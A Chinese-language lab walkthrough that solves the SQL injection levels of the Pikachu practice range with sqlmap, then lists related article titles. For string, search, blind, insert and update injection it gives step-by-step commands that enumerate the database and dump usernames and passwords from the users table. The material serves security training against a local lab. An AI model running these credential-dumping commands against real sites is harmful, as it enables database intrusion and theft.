GET型输入

字符型注入(此处细说):

随便输入点什么

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2

1.寻找注入点

sqlmap -u "URL"

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2"

找到输入点为name处

2.寻找当前数据库

sqlmap -u"URL" --current-db

sqlmap -u"http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" --current-db

数据库为pikachu

3.寻找数据库为pikachu的所有表

sqlmap -u "URL" -D 数据库名 --tables

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

4.寻找表中的所有字段:

sqlmap -u "URL"  -D 数据库名 -T 表名 --columns

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

5.寻找字段里面的值:

sqlmap -u "URL" -D 数据库名 -T 表名-C 字段1,字段2 --dump

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump

得到用户名密码

搜索型注入

URL:

http://192.168.56.1/pikachu2/vul/sqli/sqli_search.php?name=1&submit=1

命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_search.php?name=1&submit=1" -D pikachu -T users -C password --dump

xx型注入

URL:

http://192.168.56.1/pikachu2/vul/sqli/sqli_x.php?name=1&submit=1

命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_x.php?name=1&submit=1" -D pikachu -T users -C password --dump

盲注base on boolian

URL:

http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_b.php?name=222&submit=%E6%9F%A5%E8%AF%A2

命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_b.php?name=222&submit=1" -D pikachu -T users -C password --dump

盲注base on time

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_t.php?name=121&submit=1
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_t.php?name=121&submit=1" -D pikachu -T users -C password --dump

POST型注入

insert/update注入

insert注入

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_reg.php

在注册账号处抓包

使用sqlmap

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_reg.php"  --data="username=1111&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit"  -D pikachu -T users -C password --dump

sqlmap -u "URL" --data="表单名和表单值(bp上直接复制粘贴)" -D 数据库名 -T 表名 -C 字段名 --dump

全按y

 这里按1

这里按1

得到密码:

update注入

先登入进去一个注册的账号,然后点击修改个人信息

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_edit.php

填写信息后用bp抓包,点击submit

输入命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_edit.php"  --data="sex=31231&phonenum=31231&add=3131&email=3131&submit=submit"  -D pikachu -T users -C password --dump

sqlmap -u "URL" --data="sex=31231&phonenum=31231&add=3131&email=3131&submit=submit(把表单复制粘贴过来)" -D 数据库名-T 用户名 -C 字段1 --dump

这里一个一个试,1可以

有多个注射点,请选择一个注射点进行以下注射:  [0]位置:POST,参数:sex,类型:单引号字符串(默认)  [1]位置:POST,参数:phonenum,类型:单引号字符串  位置:POST,参数:add,类型:单引号字符串  [3]位置:POST,参数:email,类型:单引号字符串  [问]退出

得到密码

pikachu靶场SQL,sqlmap解法相关推荐

  1. Pikachu靶场-SQL注入-搜索型注入过关步骤

    Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...

  2. Pikachu靶场—sql注入通关

    Pikachu靶场-SQL注入篇 前言 一.数字型注入 二.字符型注入 三.搜索型注入 四.XX型注入 五.insert注入 六.delete注入 七.http header注入 八.盲注:基于布尔盲 ...

  3. Pikachu靶场-SQL Inject

    Pikachu靶场-SQL Inject SQL Inject 漏洞原理概述 SQL Inject攻击流程 如何判断是否存在注入 如何判断注入点类型及常见注入类型 数字型 字符型 搜索型 XX型 SQ ...

  4. Pikachu靶场通关笔记--Sql Inject(SQL注入)

    在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞.一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原 ...

  5. pikachu靶场通关之sql注入系列

    目录 一.前置知识 二.SQL注入 三. 注入的一般方法 1. 手动注入 (1)联合查询union注入: (2)基于报错信息注入: (3)盲注: 2. 使用sqlmap注入 (1) 前置知识 (2) ...

  6. Pikachu靶场练习

    Pikachu靶场练习 自己学习用的,写不不好不准说我. 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶 ...

  7. pikachu靶场通关

    pikachu靶场通关详解 一.靶场介绍 二.靶场配置 三.靶场实战 3.1 暴力破解漏洞 3.1.1暴力破解攻击&暴力破解漏洞概述 3.1.2暴力破解漏洞测试流程 3.1.3基于表单的暴力破 ...

  8. 攻防系列——pikachu靶场通关练习

    目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...

  9. pikachu靶场通关技巧详解

    目录 一.暴力破解 二.Cross-Site Scripting(XSS跨站脚本攻击) 三.CSRF(跨站请求伪造) 四.SQL-Inject 五.RCE 六.File Inclusion(文件包含漏 ...

最新文章

  1. 全息技术“量子飞跃”或彻底改变成像技术
  2. Aoite 系列(03) - 一起来 Redis 吧!
  3. 20155308 《信息安全系统设计基础》课程总结
  4. 1049. 数列的片段和
  5. 云炬创业政策学习笔记20210106
  6. Windows 11 任务管理器重磅升级!界面迎来全新设计,十年来首次大改!
  7. python函数对变量的作用_python函数对变量的作用及遵循的原则
  8. 西南科技大学城市学院计算机专科,西南科技大学城市学院官网
  9. windows平台下压缩tar.gz
  10. sql中带in条件的查询及提高效率
  11. 李开复:拥抱美丽的网络应用模式——云计算
  12. 电脑表格制作教程入门_微信销售小程序入门教程:制作+营销
  13. Hiho----无间道之并查集
  14. 21天学通Java学习笔记-Day03
  15. 开源FTP 服务器 FileZilla Server
  16. OLDX-FC开源飞控
  17. 一个div在另一个div里垂直居中显示
  18. 如何解决Worm.Win32.AutoRun.bqn(文件夹改exe病毒)
  19. Count(), Rank(),Percentile.inc() ,Quartile.inc()
  20. e4a 蓝牙温度app_单片机ESP8266无线传输DHT11温湿度(APP+E4A调试说明与程序设计)

热门文章

  1. 银行从业资格考试通过后如何申请证书
  2. 小波自适应阈值选取python_小波去噪阈值如何选取_小波阈值分析 - 全文
  3. 重装Win10系统之U盘启动盘的制作(详细教程)
  4. 虚幻四学习笔记(2)—— 学习途径
  5. linux强制网卡linkup,使用ip link set eth0 up 命令启用网卡后,网络不通的问题的解决...
  6. Comet OJ - 2019国庆欢乐赛 D1 入学考试 (简单版)
  7. 【数据结构】第十三站:排序(下)归并排序
  8. R语言逻辑回归logistic regression对付费用户进行预测
  9. Java-数据结构:树,这份资料可帮你解决95%的问题
  10. Octave是什么,以及Octave online的使用(相当于open source的matlab)